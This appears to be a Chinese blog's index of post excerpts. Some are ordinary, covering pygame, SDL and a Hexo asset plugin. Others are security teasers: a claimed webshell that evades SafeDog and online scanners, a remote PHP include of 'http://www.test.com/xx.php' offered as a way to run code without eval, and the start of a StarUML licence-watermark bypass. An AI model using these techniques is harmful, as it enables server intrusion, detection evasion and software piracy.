看了下pygame的介绍，发现居然是！！SDL！！2014年一直玩的东西，打算水完Python系列以后，再水一下用SDL2来做一个贪吃蛇，很久没弄了。

在一个游戏中，显示的控制也是一个比较重要的东西，在不同的机器上，界面刷新的频率不一样（也就是fps不一样），这样照成的结果就是
在不同情况下，基于帧的动画的效果会不同，本次将控制帧率

一个游戏不仅仅要能够显示出画面啊，还得接受事件并处理不是么，本次显示一波事件

上一篇文章我们显示了一个文字：hello world，这篇文章我们来显示一波图片

实训果然是实训不是实习，钱都没有，还给人洗脑
培训机构学不到什么东西的，就算充钱了也不会变强。

开启一个系列，因为每天都要水一篇文章，有技术就分享，没技术就水基础教程，先水一个贪吃蛇

因为 Hexo 的模块 hexo-asset-image 只支持图片装换，而且图片装换不太友好，根据原先的代码，我修改以后PR提交给原作者，原作者也不理我，所以新开一个坑用来处理这个问题，使用非常简单，按照常规Markdown方式引用即可，因为 Hexo 系统的原因，所有的资源都会归档到 _posts 下的同名文件夹下，使用的时候开启 post_asset_folder 配置，然后直接引用资源即可。

实例Markdown

1
2
3
4
5

# Test Assets

[archive](markdown-post/archive.zip)

![image](markdown-post/image.png)

文件夹结构

1
2
3
4

markdown-post
├── archive.zip
└── image.png
markdown-post.md

这样不管在编辑时还是处理时，都会保证资源引用的正确性，写起来也方便，不需要预览或者开启服务

模块安装

使用如下命令安装即可

1

npm install hexo-assets --save

安全狗绕过是一个比较热门的话题？反正我这边这个Shell 经过 安全狗、https://scanner.baidu.com 、http://n.shellpub.com 的检测，没检测出来，美滋滋。

检测结果

• http://n.shellpub.com/zip/tid/6b86f122-0392-404b-a660-41ef11b38e15.html
• https://scanner.baidu.com/#/pages/scan_result?hash=fe0c44bd777ef0f9bae897ed79f3d4b9

• 题目地址：https://ctf.x10sec.org/web2
• 题目级别：入门级
• 题目考察：
  • 基本编程技能
  • 网页处理

之前一直在想一个问题，怎么在不使用eval函数的前提下执行php代码，因为不管是一句话还是其他的骚操作好像都要通过eval函数来执行PHP代码（如果有其他方式，请指出吧，我表示就知道一个），现在的一句话代码也是如此，那么如何绕过这个东西来执行代码？用PHP也有几年了，今天突然灵光一闪，我们来看下面的代码：

1

include 'http://www.test.com/xx.php'

StarUML 是一个方便的UML绘图工具，一直在使用这个，现在StarUML更新到了3.0，对弹窗做了很多的优化，现在支持了原始弹窗，和右键菜单，比以前的右键菜单好多了，但是未注册的导出的图片很尬尬，有水印，学生党什么的，肯定不能购买咯， :joy: ，话不多说，开始分析。